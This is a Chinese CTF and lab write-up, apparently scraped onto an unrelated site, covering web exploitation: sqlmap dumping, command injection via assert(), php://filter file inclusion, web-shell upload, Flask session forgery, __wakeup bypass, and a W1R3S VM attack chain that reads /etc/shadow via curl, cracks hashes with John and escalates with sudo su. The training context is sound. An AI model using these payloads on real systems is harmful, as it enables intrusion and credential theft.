当前位置: 首页 > news >正文

苏州网络营销及网站推广建设网站都需要下载那些软件

苏州网络营销及网站推广,建设网站都需要下载那些软件,群晖 直接编辑wordpress,网站建设有哪些工作室写在前面 Copyright [2023] [Myon⁶]. All rights reserved. 基于自己之前在CTF中Web方向的学习#xff0c;总结出与Web相关的漏洞利用方法#xff0c;主要包括#xff1a;密码爆破、文件上传、SQL注入、PHP伪协议、反序列化漏洞、命令执行漏洞、文件包含漏洞、Vim…写在前面 Copyright © [2023] [Myon⁶]. All rights reserved. 基于自己之前在CTF中Web方向的学习总结出与Web相关的漏洞利用方法主要包括密码爆破、文件上传、SQL注入、PHP伪协议、反序列化漏洞、命令执行漏洞、文件包含漏洞、Vim文件泄露、HTTP协议、Cookie伪造、Git源码泄露并就此总结出相关的防御应对措施。 原本是在W1R3S上进行了包括信息收集、FTP渗透、Web渗透、John爆破、ssh远程登录、sudo提权等相关的渗透测试但是考虑到内容太多这里我主要总结从web渗透开始以及后续的测试实质就是一个文件包含漏洞的利用。 本人CSDN博客地址http://myon6.blog.csdn.net 期待大家的关注与支持 目录 一、基本原理概述 1、Web漏洞利用 1SQL注入 2Git泄露与命令执行漏洞 3文件上传 4PHP伪协议与文件包含漏洞 5密码爆破 6Cookie伪造 7反序列化漏洞 8Vim文件泄露 9HTTP协议 2、基于W1R3S的渗透测试 1信息收集 2FTP渗透 3Web渗透 4John爆破 5ssh远程登录 6sudo提权 二、详细过程 1、Web漏洞利用 1SQL注入 2Git泄露与命令执行漏洞 3文件上传 4PHP伪协议与文件包含漏洞 5密码爆破 6Cookie伪造 7反序列化漏洞 8Vim文件泄露 9HTTP协议 2、基于W1R3S的Web渗透测试 三、结果分析 1、SQL注入 2、Git泄露与命令执行漏洞 3、文件上传 4、PHP伪协议与文件包含漏洞 5、密码爆破 6、Cookie伪造 7、反序列化漏洞 8、Vim文件泄露 9、HTTP协议 10、基于W1R3S的Web渗透测试 四、总结体会与防御措施 背景介绍 随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生基于Web环境的互联网应用越来越广泛企业信息化的过程中各种应用都架设在Web平台上Web业务的迅速发展也引起黑客们的强烈关注接踵而至的就是Web安全威胁的凸显黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限轻则篡改网页内容重则窃取重要内部数据更为严重的则是在网页中植入恶意代码使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题对Web应用安全的关注度也逐渐升温。 一、基本原理概述 1、Web漏洞利用 1SQL注入 SQL注入是一种非常常见的数据库攻击手段SQL注入漏洞也是网络世界中最普遍的漏洞之一我们可以通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码。 2Git泄露与命令执行漏洞 开发人员使用 git 进行版本控制如果配置不当会将 .git 文件夹直接部署到线上环境引起git 泄露漏洞我们可以通过 .git文件恢复网站源码来获取一些敏感信息。 3文件上传 由于web的过滤不够严格导致在上传的位置上用户可以上传一些带有脚本的文件web端对脚本文件进行php解析可以任意执行脚本文件。 4PHP伪协议与文件包含漏洞 PHP伪协议是PHP支持的协议与封装协议我们可以使用它实现文件读取文件包含漏洞也是一种注入型漏洞其本质就是输入一段用户能够控制的脚本或者代码并让服务端执行。 5密码爆破 密码爆破又叫暴力猜解,简单来说就是将密码逐个尝试, 直到找出真正的密码为止, 本质上是利用了穷举法。 6Cookie伪造 一个脆弱的站点或者web应用可能把存储敏感状态信息直接在cookies在浏览器手动改cookie的名称和值再刷新页面可能足以获得提升的权限。 7反序列化漏洞 PHP反序列化漏洞也叫PHP对象注入形成的原因是程序未对用户输入的序列化字符串进行检测导致攻击者可以控制反序列化过程从而导致代码执行、文件操作、执行数据库操作等参数不可控。 8Vim文件泄露 当开发人员在线上环境中使用vim编辑器在使用过程中会留下vim编辑器缓存当vim异常退出时缓存会一直留在服务器上引起网站源码泄露。 9HTTP协议 HTTP协议(超文本传输协议HyperText Transfer Protocol)它是基于TCP协议的应用层传输协议简单来说就是客户端和服务端进行数据传输的一种规则。 2、基于W1R3S的渗透测试 w1r3s是一台存在着很多漏洞的靶机可为我们提供相关的漏洞进行渗透测试。 1信息收集 信息收集就像一场战争中的“深入敌后”的一项“情报收集”任务。在开始渗透测试工作之前我们通过要对目标使用各种工具进行信息收集工作找出目标的漏洞和弱点然后利用这些漏洞和弱点进行攻击使得渗透任务得以顺利地完成。 2FTP渗透 FTP全名File Transfer Protocol一种可以通过网络传输文件的协议FTP协议是不安全的不支持加密传输它使用客户端到服务器这种类型客户端启动后尝试对服务器发起连接请求然后提供登录凭证如果正确则开启会话。 3Web渗透 通过模拟恶意黑客的攻击方法来评估Web站点安全的一种评估方法。常见的Web漏洞通常包括输入输出验证不充分、设计缺陷、环境缺陷、sql注入、xss、csrf、目录穿越、文件上传、代码注入、命令注入、信息泄漏、暴力破解、越权漏洞、非授权对象引用、业务逻辑缺陷、框架漏洞、基础环境漏洞。 4John爆破 破解密码方式简单而粗暴理论上只要时间上面允许可以破译绝大多数用户密码支持多种不同类型的系统架构主要目的是破解不够牢固的Unix/Linux系统密码。 5ssh远程登录 SSHSecure Shell 是一种安全通道协议主要用来实现字符界面的远程的登录、远程复制等功能SSH协议对通信双方的数据传输进行了加密处理其中包括用户登录时输入的用户口令因此SSH协议具有很好的安全性。 6sudo提权 是一种 Linux 命令用于提升用户权限以执行特权操作在执行sudo命令时将普通用户的权限提升为root用户的权限以便执行需要root权限的操作。 二、详细过程 1、Web漏洞利用 1SQL注入 这里我主要以sqlmap来演示当然手工注入也是可以的。 1尝试列出所以数据库 sqlmap -u http://61.147.171.105:54285/?id1 --dbs 2可以看到有一个名为cyber的数据库我们指定列出它的表 sqlmap -u http://61.147.171.105:54285/?id1 -D cyber –tables 3这个数据库里只有一个表且和数据库同名我们继续列出指定表的字段 sqlmap -u http://61.147.171.105:54285/?id1 -D cyber -T cyber --columns 4尝试获取指定字段中的数据 sqlmap -u http://61.147.171.105:54285/?id1 -D cyber -T cyber -C pw --dump 2Git泄露与命令执行漏洞 1在About里发现网站是使用Git、PHP、Bootstrap搭建的 使用dirsearch扫一下 2从结果可以看出确实存在.git 目录我们这里使用Githack来下载并恢复.git文件切换到Githack所在位置执行命令python Githack.py url 3进入下载文件所在目录查看 打开flag.php但是并没有看到什么 在index.php里发现有用代码 4代码审计 使用get请求方式给page传参如果没传默认pagehome  这也是为什么我们打开题目链接进去是在home页面 $file会接收传入的$page并且在其前面拼接templates/在其后面拼接.php strpos() 函数会在$file这个字符串中进行查找是否存在.. 当字符串里有..则会返回一个数即..第一次出现的位置,结果为true 与右边的false并不恒等此时就会执行or右边的die()函数输出 Detected hacking attempt! file_exists() 函数还会检查我们传入的page拼接后是否存在 5构造payload 这里实际上是一个命令执行漏洞 我们可以直接在第一个assert()函数处就调用cat命令来获取flag 首先传入的page肯定不能有 ..使strpos() 函数返回falsefalse和右边的false恒等 构造payload?page123) or system(cat templates/flag.php);// 在最后添加注释//确保后面的代码不会执行 3文件上传 1在源码中找到默认登录账户和密码 2登陆成功后上传一句话木马 3这里没有任何的绕过直接上蚁剑尝试连接 4PHP伪协议与文件包含漏洞 1打开题目链接代码审计 file2被放入了file_get_contents() 函数,且要求返回值为 hello ctf file1是要包含的文件,且flag应该是在文件flag.php里面 我们要想办法来读取这个文件使用php://filter伪协议来读取源代码 即 file1php://filter/readconvert.base64-encode/resourceflag.php 这里出现了file_get_contents()函数想到用php://input来绕过 2构造payload /?file1php://filter/readconvert.base64-encode/resourceflag.phpfile2php://input且post传入 hello ctf 3得到一串base64编码 PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXtjMjNkY2VlOWYxZTc0NTRlNzVlMTA5OGJlMmZhM2IzOH0解码即可得到PHP源码。 5密码爆破 1根据题目描述我们先试用御剑扫一下发现存在shell后门 2访问shell.ph需要连接密码 3这里直接使用bp来爆破密码 抓包后发到Intruder 模块并设置爆破的位置和用来爆破的字典 4开始攻击 爆破过程中我们按长度排序长度不一样的就是密码 至此我们爆破出了密码是 hack 6Cookie伪造 题目要求只有管理员才能拿到flag 1在cookie里找到了一些东西 2通过查看发现web构架发现为flask想到session伪造 3将cookie值进行base64解码 输出是json格式存储还有一堆乱码应该就是数据签名。 4使用Python脚本进行session伪造 根据前面base64解码得到sessionjson格式我们将name伪造为admin并对session数据进行加密。 5将伪造的cookie传给session即可 7反序列化漏洞 1代码审计 这里出现了一个__wakeup()函数在进行PHP反序列化时会先调用这个函数但是如果序列化字符串中表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup的执行。 2脚本编写 ?php class xctf{ public $flag 111; public function __wakeup(){ exit(bad requests); } } $Myon new xctf(); $Myon serialize($Myon); echo $Myon; ? 3构造payload 上面输出的是O:4:xctf:1:{s:4:flag;s:3:111;} 可以看到__wakeup()函数起作用了我们需要将xctf的参值改为2任何大于1的数由于与反序列化规则不符就会反序列化失败从而绕过__wakeup()函数。 8Vim文件泄露 1访问.index.php.swp将文件下载下来发到centos里 2使用vim -r index.php.swp恢复文件 3代码审计 给password传入Give_Me_Your_Flag且要先经过base64编码 就会输出Oh You got my password并且调用system函数执行传入的cmd命令 4将字符串base64编码 5 构造payload postpasswordR2l2ZV9NZV9Zb3VyX0ZsYWccmdcat /flag 9HTTP协议 使用bp抓包改包重发 1请求头写 x-forwarded-for: 127.0.0.1 换一种 client-ip: 127.0.0.1 2请求头写 referer: pornhub.com 3请求头写 user-agent: Chrome 4请求头写 via: Clash.win 拿到一个路径 2、基于W1R3S的Web渗透测试 1直接访问目标ip地址 查看靶机80端口的web服务,发现是个apache的主页 2使用dirsearch对目标主机80端口的web服务进行目录爆破 dirsearch -u 192.168.88.131 爆出两个可疑目录/administrator和/wordpress wordpress这个框架存在很多漏洞 3使用whatweb命令查询发现该网站的cms为Cuppa 4使用searchsploit命令查询Cuppa cms是否存在漏洞 searchsploit cuppa cms 5发现存在一处漏洞, 漏洞详情保存在25971.txt中, 将它导出来 searchsploit cuppa cms -m 25971.txt 6查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件 7使用curl命令提交Post请求: curl -X POST -d urlConfig../../../../../../../../../etc/passwd http://192.168.88.131/administrator/alerts/alertConfigField.php 用同样的方法尝试读取shadow文件该文件是用来存放用户名密码的 curl -X POST -d urlConfig../../../../../../../../../etc/shadow http://192.168.88.131/administrator/alerts/alertConfigField.php 发现两处很明显的用户信息 分别对应着www-data用户加密密码w1r3s用户加密密码 8使用john爆破 破解成功得到 用户 www-data  密码 www-data 用户 w1r3s  密码 computer 9ssh远程登录 远程登录成功 whoami  查看一下当前用户是谁 uname -a   查看系统状态 sudo -l   查看当前用户权限 可以看到当前用户具有所有权限 10sudo提权 因为w1r3s这个用户具有全权限这里可以直接提权至root用户 sudo su  提权成功 切换到root根目录直接找到flag 三、结果分析 1、SQL注入 拿到flag cyberpeace{818e277716501adc71a98b501c4d7a99} 总结一些sqlmap常用的参数 -D 选择使用哪个数据库    -T 选择使用哪个表    -C 选择使用哪个列 --tables 列出当前的表  --columns 列出当前的列 --dump 获取字段中的数据 2、Git泄露与命令执行漏洞 传入page后查看源码找到flag cyberpeace{1f150d17210f2080d18800a5a99e9f9b} 3、文件上传 连接成功并且在根目录下面找到 flagNSSCTF{96cd0bd4-f5e6-4fbf-8b09-c38f244d4aa6} 4、PHP伪协议与文件包含漏洞 Base64解码后得到PHP源码 拿到 $flag cyberpeace{c23dcee9f1e7454e75e1098be2fa3b38} 存在文件包含时使用PHP伪协议可能遇到的文件包含函数 1、include 2、require 3、include_once 4、require_once 5、highlight_file 6、show_source 7、flie 8、readfile 9、file_get_contents 10、file_put_contents 11、fopen 5、密码爆破 将密码修改成正确的密码后放包 查看页面响应已经显示出flag flag{0bd17d36fcc7c9771191be6e558833ec} 6、Cookie伪造 将伪造的cookie传给session后便可使用伪造的admin身份拿到flag NSSCTF{df845e3b-f834-405e-9a49-3f847c5341fe} 关于session的作用 由于http协议是一个无状态的协议也就是说同一个用户第一次请求和第二次请求是完全没有关系的但是现在的网站基本上有登录使用的功能这就要求必须实现有状态而session机制实现的就是这个功能。用户第一次请求后将产生的状态信息保存在session中这时可以把session当做一个容器它保存了正在使用的所有用户的状态信息这段状态信息分配了一个唯一的标识符用来标识用户的身份将其保存在响应对象的cookie中当第二次请求时解析cookie中的标识符拿到标识符后去session找到对应的用户的信息。 7、反序列化漏洞 我们正确的payload为?codeO:4:xctf:2:{s:4:flag;s:3:111;} 传入后即可拿到flag 在php中与序列化相关的函数为 serialize()  序列化  // 将一个类的实例对象序列化为字符串 unserialize() 反序列化  // 将已序列化的变量字符串变回原来 PHP的值 8、Vim文件泄露 Post传参后拿到flag NSSCTF{b8776bdb-b398-4544-b006-72ee55c5a531} 使用 vim -r 来查看当前目录下的所有swp文件也可以使用 vim -r filename 来恢复文件这样上次意外退出没有保存的修改就会覆盖文件。 9、HTTP协议 访问拿到的路径 在源码里找到另一个路径继续访问拿到flag NSSCTF{d295698b-50ae-47ed-8393-2463797931d3} 10、基于W1R3S的Web渗透测试 前期我们是需要先进行信息收集确定靶机IP以及对靶机进行端口扫描确定开放的端口和服务探测出可能存在的漏洞这对我们进行后续的渗透具有极其重要的作用。 从最初不知道登录密码 到最后彻底拿下整台靶机 四、总结体会与防御措施 从上面的Web漏洞利用中我们可以看到Web安全漏洞的危害之大而且无处不在只要稍不注意就有可能导致个人信息的泄露。在Internet大众化及Web技术飞速演变的今天在线安全所面临的挑战日益严峻伴随着在线信息和服务的可用性的提升以及基于Web的攻击和破坏的增长安全风险达到了前所未有的高度。上面的CTF赛题大多其取材于真实环境渗透只说一句话开发和安全缺一不可 1、针对注入漏洞我们通常可以通过适当、及时地检查与清理用户的输入来防范此类威胁严格限制web应用的数据库的操作权限给用户提供仅能满足需求的最低权限从而最大限度的减少注入攻击对数据库的危害。 2、针对身份验证相关的漏洞我们可以通过实施健全的会话管理控制、多因素身份验证、限制和监视失败的登录尝试避免使用默认密码进行弱密码检查使用服务端安全内置的会话管理确保对于每次登录生成随机会话ID会话ID不应该在URL中且应该及时销毁。 3、针对敏感数据泄漏我们可以对系统处理、存储或传输的数据分类并根据分类进行访问控制对于没必要存放的、重要的敏感数据应当尽快清除或者通过PCI DSS标记或拦截。未存储的数据不能被窃取。 4、针对受损的访问控制带来的未经授权的信息泄露、数据被直接修改或破坏我们可以通对前后端同时对用户输入信息进行校验双重验证机制执行关键操作前必须验证用户身份验证用户是否具备操作数据的权限。 5、针对不安全的反序列化漏洞我们需要对任何序列化对象进行完整性检测比如数字签名以防止数据篡改或恶意对象限制或监管入的和出的来自反序列化的容器或服务器的网络链接。 6、针对任意文件上传和读取下载我们通过设置白名单即只能下载/访问某个目录下的文件权限给到最低正则严格判断用户输入参数的格式php.ini配置open_basedir限定文件访问范围。 注Copyright © [2023] [Myon⁶]. All rights reserved.
http://www.pierceye.com/news/402242/

相关文章:

  • 网站优化排名易下拉技术做官网的步骤
  • 网站备案多久服装企业 北京 网站建设
  • 网站建设(信奈辉煌电商)陕西富通建设工程有限公司网站
  • 南昌县住房和城乡建设局网站外海网站如何做网站的推广
  • 重庆网站推广报价wordpress全景图
  • 做那个的网站谁有建立什么指标体系和评价程序规范
  • 新旧网站对比全国建设厅网站
  • 有经验的番禺网站建设做球服的网站有哪些
  • 临泉建设网站互联网行业都有哪些工作
  • 甘肃省嘉峪关建设局网站做游戏交易网站
  • 校园网站做自己的广告惠州网络问政平台官网
  • 网站建设使用的什么和国外做贸易用什么网站
  • 苏州自助建站模板宁波seo快速优化
  • 做网站的可行性分析网络推广渠道公司
  • 企业网站优化兴田德润优惠汕头网络营销推广该怎么做
  • 安徽省住房和建设厅网站企业网站建设硬件
  • 网站怎样运营网站文章收录
  • 怎么制作微网站wordpress 自动安装
  • 建设软件网站七台河新闻直播
  • 深圳 公司网站设计网站建设得花多少钱
  • 社交型网站首页面设计分析宁夏电建网站
  • 网站开发需要掌握的知识中国建设网官方网站
  • 制作网站素材网页设计代码步骤
  • 做微信头图的网站网页编程语言有哪几种
  • 医生工作室网站建设男女激烈做羞羞事网站网站韩剧
  • 网站里面网友点评怎么做网站开发需要资质吗
  • gta 买房网站建设中软件下载免费大全网站
  • 中国移动网站专门拍短视频的公司
  • 网站制作网站建设报价南通优化网站怎么收费
  • 网站的连接二维码怎么做wordpress.org账号